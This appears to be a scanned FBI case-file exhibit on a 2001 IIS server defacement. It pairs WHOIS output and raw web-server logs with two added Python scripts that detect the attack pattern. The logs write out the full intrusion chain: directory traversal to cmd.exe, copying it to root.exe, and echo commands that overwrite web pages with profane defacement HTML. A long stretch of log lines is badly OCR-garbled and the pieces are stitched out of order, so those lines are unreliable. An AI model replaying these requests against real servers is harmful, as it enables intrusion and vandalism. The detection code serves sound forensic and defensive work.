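```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Field order of the Microsoft IIS log format (IIS 4.0), as in the fax excerpts.
FIELDS = ("client_ip", "user", "date", "time", "service", "server",
          "server_ip", "time_taken", "bytes_recv", "bytes_sent",
          "status", "win32_status", "method", "stem", "query")

# Constructed sample lines modelled on the excerpts above (not the evidence
# itself); 198.51.100.7 is a documentation address standing in for a normal visitor.
SAMPLE_LOG = r"""
200.53.234.124, -, 5/6/01, 18:29:28, W3SVC1, GCGPO1, 192.168.1.13, 391, 66, 505, 200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+dir,
200.53.234.124, -, 5/6/01, 18:29:39, W3SVC1, GCGPO1, 192.168.1.13, 31, 100, 382, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+copy+\winnt\system32\cmd.exe+root.exe,
200.53.234.124, -, 5/6/01, 18:30:12, W3SVC1, GCGPO1, 192.168.1.13, 62, 423, 355, 502, 0, GET, /scripts/root.exe, /c+echo+^<html^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^</html^>>.././index.asp,
200.53.234.124, -, 5/6/01, 18:30:23, W3SVC1, GCGPO1, 192.168.1.13, 16, 425, 355, 502, 0, GET, /scripts/root.exe, /c+echo+^<html^>fuck+USA+Government^</html^>>.././default.htm,
198.51.100.7, -, 5/6/01, 18:31:00, W3SVC1, GCGPO1, 192.168.1.13, 15, 300, 2000, 200, 0, GET, /index.asp, -,
"""

COPY_RE = re.compile(r"copy\s+\S*cmd\.exe\s+(\S+)", re.I)
# Output redirect = the last '>' that is not escaped with cmd.exe's caret.
REDIRECT_RE = re.compile(r"(?<!\^)>>?\s*(\S+)\s*$")


def parse_iis_line(line):
    """Split one Microsoft-IIS-format line into a dict (None for blank/odd lines)."""
    line = line.strip()
    if not line:
        return None
    parts = line.rstrip(",").split(", ", len(FIELDS) - 1)
    if len(parts) != len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    rec["status"] = int(rec["status"])
    # IIS logs the stem already decoded; the query keeps %xx and '+', which
    # reached cmd.exe as spaces, so decode it the same way before matching.
    rec["cmd"] = unquote(rec["query"]).replace("+", " ")
    return rec


def classify(rec):
    """Map a request to one step of the traversal / dropper / defacement chain."""
    stem = rec["stem"].lower()
    if ".." in stem and stem.endswith("/winnt/system32/cmd.exe"):
        m = COPY_RE.search(rec["cmd"])
        return ("drop_shell", m.group(1)) if m else ("traversal_exec", rec["cmd"])
    if stem.endswith("/root.exe"):
        m = REDIRECT_RE.search(rec["cmd"])
        if m and "echo" in rec["cmd"].lower():
            return ("deface", m.group(1))
        return ("shell_exec", rec["cmd"])
    return None


def defacement_text(cmd):
    """Recover the readable message from an 'echo ^<html^>...>file' command."""
    body = re.split(r"echo\s*", cmd, maxsplit=1, flags=re.I)[1]
    body = REDIRECT_RE.sub("", body).replace("^", "")
    return " ".join(re.sub(r"<[^>]*>", " ", body).split())


def analyze(log_text):
    """Per client IP: ordered steps, defaced paths, messages and status codes seen."""
    report = defaultdict(lambda: {"stages": [], "defaced": [],
                                  "messages": set(), "statuses": set()})
    for line in log_text.splitlines():
        rec = parse_iis_line(line)
        hit = classify(rec) if rec else None
        if hit is None:
            continue
        kind, detail = hit
        r = report[rec["client_ip"]]
        r["stages"].append((rec["time"], kind, detail, rec["status"]))
        r["statuses"].add(rec["status"])
        if kind == "deface":
            r["defaced"].append(detail)
            r["messages"].add(defacement_text(rec["cmd"]))
    return dict(report)


def has_defacement_chain(r):
    """True when the client dropped root.exe and later wrote files through it."""
    kinds = [s[1] for s in r["stages"]]
    return ("drop_shell" in kinds and "deface" in kinds
            and kinds.index("drop_shell") < kinds.index("deface"))


if __name__ == "__main__":
    for ip, r in analyze(SAMPLE_LOG).items():
        print(ip, "full chain" if has_defacement_chain(r) else "partial",
              sorted(r["statuses"]), r["defaced"], sorted(r["messages"]))
```

Run against a real IIS 4.0 log the same way, one line per request; the only per-site adjustment is the stem pattern if the traversal went through a virtual directory other than /scripts (the /msadc and /iisadmpwd directories were common alternatives). The defaced paths are relative to the directory root.exe ran in, so resolving them to files on disk needs the physical path of that virtual directory from the IIS configuration, not just the log.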


[handwritten: "Excerpt of log file ..."; remainder illegible]


WHOIS information on IP numbers

IP whois of 210.253.184.3

ipw: Connecting to server: whois.arin.net:43
ipw: Query: net 210.253.184.3
ipw: Connecting to server: whois.apnic.net:43
ipw: Query: 210.253.184.3

inetnum:   210.253.184.0 - 210.253.184.31
netname:   TV-HANNO
descr:     Hanno Cable Television Corp.
descr:     19-1 Kokubo, Hanno-shi, Saitama 357-0015, JAPAN
country:   JP
admin-c:   AM575JP
tech-c:    [illegible; reads TUS9I3TP]
remarks:   This information has been partially mirrored by APNIC from
remarks:   JPNIC. To obtain more specific information, please use the
remarks:   JPNIC whois server at whois.nic.ad.jp. (This defaults to
remarks:   Japanese output, use the /e switch for English output)
remarks:   [the same four lines repeated]
changed:
changed:
source:
[Second log excerpt, same Microsoft IIS log format: client IP, user, date, time, service, server name, server IP, time taken (ms), bytes received, bytes sent, HTTP status, Win32 status, method, URI stem, URI query. Carets (^) are cmd.exe escape characters. Every root.exe request carries the same echo payload; it is written out in full once below and abbreviated as [defacement HTML as above] thereafter.]

210.253.184.3, -, 5/7/01, 3:34:04, W3SVC1, GCGPO1, 192.168.1.13, 31, 66, 554, 200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+dir,
210.253.184.3, -, 5/7/01, 3:34:04, W3SVC1, GCGPO1, 192.168.1.13, 15, 70, 1000, 200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+dir+..\,
210.253.184.3, -, 5/7/01, 3:34:04, W3SVC1, GCGPO1, 192.168.1.13, 32, 100, 382, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+copy+\winnt\system32\cmd.exe+root.exe,
210.253.184.3, -, 5/7/01, 3:34:04, W3SVC1, GCGPO1, 192.168.1.13, 125, 423, 355, 502, 0, GET, /scripts/root.exe, /c+echo+^<html^>^<body+bgcolor%3Dblack^>^<br^>^<br^>^<br^>^<br^>^<br^>^<br^>^<table+width%3D100%^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+USA+Government^</font^>^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D7+color%3Dred^>fuck+PoizonBOx^<tr^>^<td^>^<p+align%3D%22center%22^>^<font+size%3D4+color%3Dred^>contact:sysadmcn@yahoo.com.cn^</html^>>.././index.asp,
210.253.184.3, -, 5/7/01, 3:34:06, W3SVC1, GCGPO1, 192.168.1.13, 16, 423, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>.././index.htm,
210.253.184.3, -, 5/7/01, 3:34:06, W3SVC1, GCGPO1, 192.168.1.13, 15, 425, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>.././default.asp,
210.253.184.3, -, 5/7/01, 3:34:06, W3SVC1, GCGPO1, 192.168.1.13, 16, 425, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>.././default.htm,
210.253.184.3, -, 5/7/01, 3:34:06, W3SVC1, GCGPO1, 192.168.1.13, 31, 100, 382, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+copy+\winnt\system32\cmd.exe+root.exe,
210.253.184.3, -, 5/7/01, 3:34:08, W3SVC1, GCGPO1, 192.168.1.13, 328, 424, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../../index.asp,
210.253.184.3, -, 5/7/01, 3:34:08, W3SVC1, GCGPO1, 192.168.1.13, 32, 424, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../../index.htm,
210.253.184.3, -, 5/7/01, 3:34:08, W3SVC1, GCGPO1, 192.168.1.13, 16, 426, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../../default.asp,
210.253.184.3, -, 5/7/01, 3:34:08, W3SVC1, GCGPO1, 192.168.1.13, 31, 426, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../../default.htm,
210.253.184.3, -, 5/7/01, 3:34:08, W3SVC1, GCGPO1, 192.168.1.13, 32, 100, 382, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+copy+\winnt\system32\cmd.exe+root.exe,
210.253.184.3, -, 5/7/01, 3:34:11, W3SVC1, GCGPO1, 192.168.1.13, 125, 429, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../wwwroot/index.asp,
210.253.184.3, -, 5/7/01, 3:34:11, W3SVC1, GCGPO1, 192.168.1.13, 16, 429, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../wwwroot/index.htm,
210.253.184.3, -, 5/7/01, 3:34:11, W3SVC1, GCGPO1, 192.168.1.13, 15, 431, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../wwwroot/default.asp,
210.253.184.3, -, 5/7/01, 3:34:11, W3SVC1, GCGPO1, 192.168.1.13, 16, 431, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../wwwroot/default.htm,
210.253.184.3, -, 5/7/01, 3:34:11, W3SVC1, GCGPO1, 192.168.1.13, 47, 100, 382, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+copy+\winnt\system32\cmd.exe+root.exe,
210.253.184.3, -, 5/7/01, 3:34:13, W3SVC1, GCGPO1, 192.168.1.13, 140, 429, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../ftproot/index.asp,
210.253.184.3, -, 5/7/01, 3:34:13, W3SVC1, GCGPO1, 192.168.1.13, 16, 429, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../ftproot/index.htm,
210.253.184.3, -, 5/7/01, 3:34:13, W3SVC1, GCGPO1, 192.168.1.13, 16, 431, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../ftproot/default.asp,
210.253.184.3, -, 5/7/01, 3:34:13, W3SVC1, GCGPO1, 192.168.1.13, 31, 431, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../ftproot/default.htm,
210.253.184.3, -, 5/7/01, 3:34:13, W3SVC1, GCGPO1, 192.168.1.13, 31, 100, 382, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+copy+\winnt\system32\cmd.exe+root.exe,
210.253.184.3, -, 5/7/01, 3:34:16, W3SVC1, GCGPO1, 192.168.1.13, 125, 430, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../gophroot/index.asp,
210.253.184.3, -, 5/7/01, 3:34:16, W3SVC1, GCGPO1, 192.168.1.13, 31, 430, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../gophroot/index.htm,
210.253.184.3, -, 5/7/01, 3:34:16, W3SVC1, GCGPO1, 192.168.1.13, 31, 432, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../gophroot/default.asp,
210.253.184.3, -, 5/7/01, 3:34:16, W3SVC1, GCGPO1, 192.168.1.13, 31, 432, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../gophroot/default.htm,
210.253.184.3, -, 5/7/01, 3:34:16, W3SVC1, GCGPO1, 192.168.1.13, 31, 100, 382, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+copy+\winnt\system32\cmd.exe+root.exe,
210.253.184.3, -, 5/7/01, 3:34:18, W3SVC1, GCGPO1, 192.168.1.13, 156, 429, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../scripts/index.asp,
210.253.184.3, -, 5/7/01, 3:34:18, W3SVC1, GCGPO1, 192.168.1.13, 16, 429, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../scripts/index.htm,
210.253.184.3, -, 5/7/01, 3:34:18, W3SVC1, GCGPO1, 192.168.1.13, 16, 431, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../scripts/default.asp,
210.253.184.3, -, 5/7/01, 3:34:18, W3SVC1, GCGPO1, 192.168.1.13, 31, 431, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../scripts/default.htm,
210.253.184.3, -, 5/7/01, 3:34:20, W3SVC1, GCGPO1, 192.168.1.13, 31, 100, 382, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+copy+\winnt\system32\cmd.exe+root.exe,
210.253.184.3, -, 5/7/01, 3:34:20, W3SVC1, GCGPO1, 192.168.1.13, 125, 432, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../iissamples/index.asp,
210.253.184.3, -, 5/7/01, 3:34:20, W3SVC1, GCGPO1, 192.168.1.13, 16, 432, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../iissamples/index.htm,
210.253.184.3, -, 5/7/01, 3:34:20, W3SVC1, GCGPO1, 192.168.1.13, 15, 434, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../iissamples/default.asp,
210.253.184.3, -, 5/7/01, 3:34:20, W3SVC1, GCGPO1, 192.168.1.13, 16, 434, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../iissamples/default.htm,
210.253.184.3, -, 5/7/01, 3:34:23, W3SVC1, GCGPO1, 192.168.1.13, 31, 100, 382, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+copy+\winnt\system32\cmd.exe+root.exe,
210.253.184.3, -, 5/7/01, 3:34:23, W3SVC1, GCGPO1, 192.168.1.13, 156, 434, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../w3rootbackup/index.asp,
210.253.184.3, -, 5/7/01, 3:34:23, W3SVC1, GCGPO1, 192.168.1.13, 16, 434, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../w3rootbackup/index.htm,
210.253.184.3, -, 5/7/01, 3:34:23, W3SVC1, GCGPO1, 192.168.1.13, 47, 436, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../w3rootbackup/default.asp,
210.253.184.3, -, 5/7/01, 3:34:25, W3SVC1, GCGPO1, 192.168.1.13, 31, 436, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../w3rootbackup/default.htm,
210.253.184.3, -, 5/7/01, 3:34:25, W3SVC1, GCGPO1, 192.168.1.13, 46, 100, 382, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+copy+\winnt\system32\cmd.exe+root.exe,
210.253.184.3, -, 5/7/01, 3:34:25, W3SVC1, GCGPO1, 192.168.1.13, 140, 430, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../gkodmail/index.asp,
210.253.184.3, -, 5/7/01, 3:34:25, W3SVC1, GCGPO1, 192.168.1.13, 32, 430, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../gkodmail/index.htm,
210.253.184.3, -, 5/7/01, 3:34:25, W3SVC1, GCGPO1, 192.168.1.13, 31, 432, 355, 502, 0, GET, /scripts/root.exe, /c+echo+[defacement HTML as above]>../gkodmail/default.asp,
210.253.184.3, -, 5/7/01, 3:34:27, W3SVC1, GCGPO1, 192.168.1.13, 47, 432, 355,
502, 0, GET, /scripts/root.exe, 
/c+echot*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
able+widtht3D100%“>“<td*>*<p+align$3D%22center%$22*%>*<font+size$3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center%22*%>“<font+sizes 
3D7+colors3Dred*>f£uck+PoizonBOx*<tr*>*<td*>*<ptalign$3D%22center$22*%>*<font+siz 
e%3D4t+color%3Dred*>contact: sysadmcn@yahoo.com.cn*</html*>>../gkodmail/default-h 
tm, é 

210.253.184.3, ~, 5/7/01, 3:34:27, W3SVC1, GCGPO1, 192.168.1.13, 31, 100; 382, 
502, 0, GET, /scripts/../../winnt/system32/cmd.exe, 
/c+copyt\winnt\system32\cmd.exetroot.exe, 

210.253.184.3, -, 5/7/01, 3:34:31, W3SVC1, GCGPO1, 192.168.1.13, 62, 428, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<body+tbgcolor$3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br“>“*<br*>*<t 
abletwidth%3D100%%*>*<td*>*<ptalign?3D%22center$22*>*<font+sizes3D7+color%3Dred”* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center$22°>*<font+sizes 
3D7+color%3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptalign$3D%22center%22*%>*<font+siz 
e$3D4+colors3Dred*>contact: sysadmen@yahoo.com.cn*</html*>>../dimail/index.asp, 
210.253.184.3, -, 5/7/01, 3:34:31, W3SVC1, GCGPO1, 192.168.1.13, 16, 428, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<body+tbgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
abletwidth%3D100%*>*<td*>*<ptalign%3D%22center$22°>*<font+sizes3D7+color$3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign$3D%$22center%22*>*<font+sizes 
3D7+color$3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptaligns3D%22center%22%>*<fontt+siz 
e$3D4+color%3Dred*>contact: sysadmen@yahoo.com.cn*</html*>>../dimail/index.htm, 
210.253.184.3, -, 5/7/01, 3:34:31, W3SVC1, GCGPO1, 192.168.1.13, 15, 430, 355, 
502, 0, GET, /scripts/root.exe, : 
/ctechot*<htnl*>*<body+bgcolor$3Dblack*>“<br*>*<br*>*<br*>*<br*>“<br*>*<br*>*<t 
abletwidth$3D100%*>“*<td*>“*<ptalign%3D%22center$22*>*<font+sizes3D7+color%3Dred* 
>fuckt+USA+Government*</font*>*<tr*>*<td*>*<ptaligns3D%22center%22*>*<font+sizes 
3D7+color$3Dred*>fuck+PoizonBOx*<tr*>*<td*>“*<ptalign$3D%$22center$22*%>*<fonttsiz 
e%3D4+colors3Dred*>contact: sysadmcen@yahoo.com.cn*</html*>>../dimail/default.asp 


f 

210.253.184.3, -, 5/7/01, 3:34:31, W3SVC1, GCGPO1, 192.168.1.13, 31, 430, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<bodytbgcolor%3Dblack*>*<br*>*<br*>*<br*>*<br%>*<br“>*<br*>*<t 
ablet+widtht3D100%*>*<td*>*<ptalign$3D%22center%22*%>%<font+size$3D7+color$3Dred* 
>fuckt+USA+Government*</font*>*<tr*>*<td*>*<pralign$3D%22center$22*>*<font+tsizes 
3D7+color$3Dred*>£uck+PoizonBOx*<tr*>*<td*>*<ptaligns3D%22center%22%>*<font+siz 
e$3D4+color%3Dred*>contact: sysadmcen@yahoo. com. cn*</html*>>../dimail/default.htm 


f . 

210.253.184.3, -, 5/7/01, 3:34:31, W3SVC1, GCGPO1, 192.168.1.13, 16, 78, 881, 
200, 0, GET, /scripts/../../winnt/system32/cmd.exe, /ctdirt..\wwwroot\, 
210.253.184.3, -, 5/7/01, 3:34:34, W3SVC1, GCGPO1, 192.168.1.13, 47, 100, 382, 
502, 0, GET, /scripts/../../winnt/system32/cmd.exe, 

/ctcopyt\winnt\system32\cmd. exet+root.exe, 

210.253.184.3, -, 5/7/01, 3:34:34, W3SVC1, GCGPO1, 192.168.1.13, 156, 431, 355, 
502, 0, GET, /scripts/root.exe, 
/ctecho+*<html*>*<body+bgcolors3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<bpre>*<t 
ablet+twidth83D100%*>“<td*>*<p+align%3D%$22center%$22%>*<font+sizes3D7+color$3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptaligns3D%22center$22*%>*<font+sizes 
3D7+color%3Dred*>fuck+Poi zonBOx*<txr*>*<td*>*<ptalign%3D$22center%22°>*<font+siz 
e$3D4+colors3Dred*>contact: sysadmcn@yahoo.com.cn*</htmL*>>../wwwroot/./index.as 
Pp, 

210.253.184.3, -, 5/7/01, 3:34:34, W3SVC1, GCGPO1, 192.168.1.13, 31, 431, 355, 
502, 0, GET, /scripts/root.exe, : 

/erechot*<html “*>*<bodytbgcolor$3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<bre>*<t 
abletwidth$3D100%*>*<td“>*<ptalign%3D%$22center$22*>*<font+size$3D7+color%3Dred* 
>fuck+USAt+Government*</font*>*<tr*>*<td*>*<ptalign$3D$22center$22%>*<font+sizes 
3D7+color$3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptalign’3D$22center$22*>*<fonttsiz 


e33D4+color$3Dred*>contact: sysadmcn@yahoo.com.cn*</htmL*>>../wwwroot/./index.ht 
m, 


210.253.184.3, -, 5/7/01, 3:34:34, W3SVC1, GCGPO1, 192.168.1.13, 31, 433, 355, 
502, 0, GET, /scripts/root.exe, 
/crechot*<html*>*<body+bgcolor$3Dblack*>“<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
able+width%3D100%*>*<td*>*<ptalign%3D%22center$22“>*<font+size$3D7+color%3Dred* 
>fuck+USAt+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center%22*>*<font+sizes 
3D7+color%3Dred*>f£uck+PoizonBOx*<tr°>*<td*>*<ptalignt3D%$22center%22%>*<fontt+siz 
e$3D4+color%3Dred*>contact: sysadmen@yahoo. com.cn*</html*>>../wwwroot/./default. 
asp, : 

210.253.184.3, -, 5/7/01, 3:34:36, W3SVC1, GCGPO1, 192.168.1.13, 32, 433, 355, 
502, 0, GET, /scripts/root.exe, 
/ct+echot*<html*>*<body+bgcolor$3Dblack*>*<br*>*<br*>*<br%>*<br*>*<br*>*<br*>*<t 
abletwidth%3D100%*>*<td*>*<ptalign%3D%22center$22*%>%<fonttsize$3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign%3D%22center$22°%>“<fontt+size% 
3D7+color$3Dred*>fuck+Poi zonBOx*<tr*>*<td*>*<ptralignt3D%22center$22*>*<font+siz 
e%3D4+color%3Dred*>contact: sysadmen@yahoo.com.cn*</html*>>../wwwroot/./default. 
htm, : 

210.253.184.3, -, 5/7/01, 3:34:36, W3SVC1, GCGPO1, 192.168.1.13, 47, 100, 382, 
502, 0, GET, /scripts/../../winnt/system32/cmd.exe, 
/ce+copy+\winnt\system32\cmd.exet+root.exe, 

210.253.184.3, -, 5/7/01, 3:34:36, W3SVC1, GCGPO1, 192.168.1.13, 156, 432, 355, 
502, 0, GET, /scripts/root.exe, 
/ctechot*<html*>*<body+bgcolor$3Dblack*>*<br*>*<br*>*<br*>*<br*>*<br*>*<br*>*<t 
ablet+width3D100%%>*<td*>*<ptalign33D%22center$22%>*<font+size$3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr*>*<td*>*<ptalign$3D%22center$22*>*<font+sizes 
3D7+color$3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptalign$3D%22center%22°>*<font+siz 
e$3D4+color$3Dred*>contact: sysadmcn@yahoo. com. cn*</html*>>../wwwroot/../index.a 
SP, 

210.253.184.3, -, 5/7/01, 3:34:36, W3SVC1, GCGPO1, 192.168.1.13, 16, 432, 355, 
502, 0, GET, /scripts/root.exe, 
/c+echot*<html*>“<body+bgcolor$3Dblack*>*<br*>*<br*>*<br%>*<br*>*<br*>*<br*>*<t 
ablet+width$3D100%*>*<td*>*<ptalign$3D%22center%22*>*<fontt+size$3D7+color%3Dred* 
>fuck+USA+Government*</font*>*<tr*>“<td*>*<ptaligné3D%$22center$22*>*<font+sizes 
3D7+color$3Dred* >fuck+Poi zonBOx*<tr*>*<td*>*<ptraligns3D%22center$22*>*<font+siz 
e$3D4+color$3Dred*>contact: sysadmen@yahoo. com. cn*</htm1l*>>../wwwroot/../index.h 
tm, 

210.253.184.3, -, 5/7/01, 3:34:38, W3SVC1, GCGPO1, 192.168.1.13, 16, 434, 355,° 
502, 0, GET, /scripts/root.exe, 

/c+echot*<html *>*<bodytbgcolor%3Dblack*>*<br*>*<br*>"<br*>*<br*>*<br*>*<br*>*<t 
ablet+twidth$3D100%*>“<td*>“<ptalign33D%$22center$22*>*<font+sizet3D7+color$3Dred* 
>fuck+USAt+Government*</font*>*<tr*>“*<td*>*<ptralign$3D%$22center$22*>*<font+sizes 
3D7+colort3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptalign%3D%22center$22°>*<font+siz 
e&3D4+color$3Dred*>contact: sysadmcn@yahoo. com.cn*</html*>>../wwwroot/../default 
-asp, 

240.253.184.3, -, 5/7/01, 3:34:38, W3SVC1, GCGPO1, 192.168.1.13, 16, 434, 355, 
502, 0, GET, /scripts/root.exe, 
/etrechot*<html*>*<body+bgcolor%3Dblack*>*<br*>*<br“>*<br*>*<br*>“<br*>*<br7>*<t 
able+width83D100%*>*<td*>*<ptalign%3D%22centexr%22*>*<font+size$3D7+color$3Dred* 
>fuck+USA+Government*</font*>*<tr>“*<td*>*<ptalign%3D%22center%22*>*<fonttsize%s 
3D7+colors3Dred*>fuck+PoizonBOx*<tr*>*<td*>*<ptaligns3D$22center$22*>*<fontt+siz 
e$3D4+color$3Dred*>contact: sysadmen@yahoo.com.cn*</html*>>. ./wwwroot/../default 
-htm, - 


fuck USA Government

fuck PoizonBOx

contact:sysadmcn@yahoo.com.cn


[Handwritten caption:] Result of intrusions [illegible], in red on black background
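A defender's way to read the exhibit above: the following added example (not part of the case file or any victim's tooling) parses Microsoft IIS-format records laid out like those shown and flags the two-step pattern they record, a directory-traversal request that copies cmd.exe to root.exe, followed by root.exe echo commands that redirect HTML into the web root. The sample records, host names and addresses are constructed for the test, not copied from the exhibit.

```python
"""Flag the cmd.exe-staging / root.exe-defacement pattern in Microsoft IIS-format logs.

Added example (not part of the case file). Field layout follows the Microsoft IIS
log file format seen in the exhibit: client IP, user, date, time, service, server
name, server IP, time taken, bytes received, bytes sent, HTTP status, Win32 status,
method, URI stem, URI query. Every sample record, host name and address below is
constructed for this example."""
import re
from collections import defaultdict
from urllib.parse import unquote_plus

FIELDS = ("client_ip", "user", "date", "time", "service", "server", "server_ip",
          "time_taken", "bytes_recv", "bytes_sent", "status", "win32_status",
          "method", "uri_stem", "uri_query")

# Constructed sample: one source stages a shell copy, writes a page, lists the
# web root (with an encoded traversal); a second source is ordinary traffic.
SAMPLE_LOG = r"""
198.51.100.7, -, 5/7/01, 3:34:25, W3SVC1, WEB01, 10.0.0.5, 46, 100, 382, 502, 0, GET, /scripts/../../winnt/system32/cmd.exe, /c+copy+\winnt\system32\cmd.exe+root.exe,
198.51.100.7, -, 5/7/01, 3:34:25, W3SVC1, WEB01, 10.0.0.5, 140, 430, 355, 502, 0, GET, /scripts/root.exe, /c+echo+^<html^>defaced^</html^>>../wwwroot/index.asp,
198.51.100.7, -, 5/7/01, 3:34:31, W3SVC1, WEB01, 10.0.0.5, 16, 78, 881, 200, 0, GET, /scripts/%2e%2e/%2e%2e/winnt/system32/cmd.exe, /c+dir+..\wwwroot\,
203.0.113.9, -, 5/7/01, 3:40:02, W3SVC1, WEB01, 10.0.0.5, 12, 220, 1540, 200, 0, GET, /default.asp, -,
"""


def parse_iis_line(line):
    """Parse one record. Fields are ', '-separated and the line ends with a
    trailing comma; the query is last and may itself contain commas, so split
    at most 14 times. Returns None for blank or malformed lines."""
    line = line.strip()
    if line.endswith(","):
        line = line[:-1]
    parts = line.split(", ", 14)
    if len(parts) != len(FIELDS):
        return None
    rec = dict(zip(FIELDS, parts))
    # Decode %xx and '+' so the rules see what cmd.exe actually received
    # (catches %2e%2e traversal spellings as well as the literal "..").
    rec["stem_decoded"] = unquote_plus(rec["uri_stem"])
    rec["query_decoded"] = unquote_plus(rec["uri_query"])
    return rec


# Each rule names one step of the chain recorded in the exhibit.
RULES = (
    # Directory traversal out of /scripts to the system shell.
    ("TRAVERSAL_CMD", lambda r: "/../" in r["stem_decoded"]
                                and r["stem_decoded"].lower().endswith("cmd.exe")),
    # Requests to the copied shell that the staging step left in /scripts.
    ("ROOT_EXE", lambda r: r["stem_decoded"].lower().endswith("/root.exe")),
    # The staging command: copy cmd.exe into the web-reachable directory.
    ("COPY_SHELL", lambda r: re.search(r"\bcopy\b.*cmd\.exe.*root\.exe",
                                       r["query_decoded"], re.I) is not None),
    # echo ... >../<dir>/<page>: HTML redirected into a file under the web root.
    ("WEBROOT_WRITE", lambda r: re.search(r"\becho\b.*>\s*\.\./",
                                          r["query_decoded"], re.I) is not None),
)


def analyze(log_text):
    """Return {client_ip: [event, ...]} for every record that trips a rule.
    Status is reported but never filtered on: in the exhibit the copy and echo
    requests were logged as 502 (the redirected command sent IIS no CGI output)
    and only the 'dir' listing returned 200, yet the pages were overwritten."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_iis_line(line)
        if rec is None:
            continue
        matched = [name for name, test in RULES if test(rec)]
        if matched:
            hits[rec["client_ip"]].append({"time": rec["time"], "status": rec["status"],
                                           "stem": rec["uri_stem"], "rules": matched})
    return dict(hits)


def defacement_sources(hits):
    """Sources that completed the chain: staged a shell copy and wrote into the web root."""
    return sorted(ip for ip, events in hits.items()
                  if {"COPY_SHELL", "WEBROOT_WRITE"} <= {r for ev in events for r in ev["rules"]})


if __name__ == "__main__":
    found = analyze(SAMPLE_LOG)
    for ip, events in found.items():
        for ev in events:
            print(ip, ev["time"], ev["status"], ev["stem"], ",".join(ev["rules"]))
    print("defacement chain from:", defacement_sources(found))
```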


FD-302 (Rev. 10-6-95)


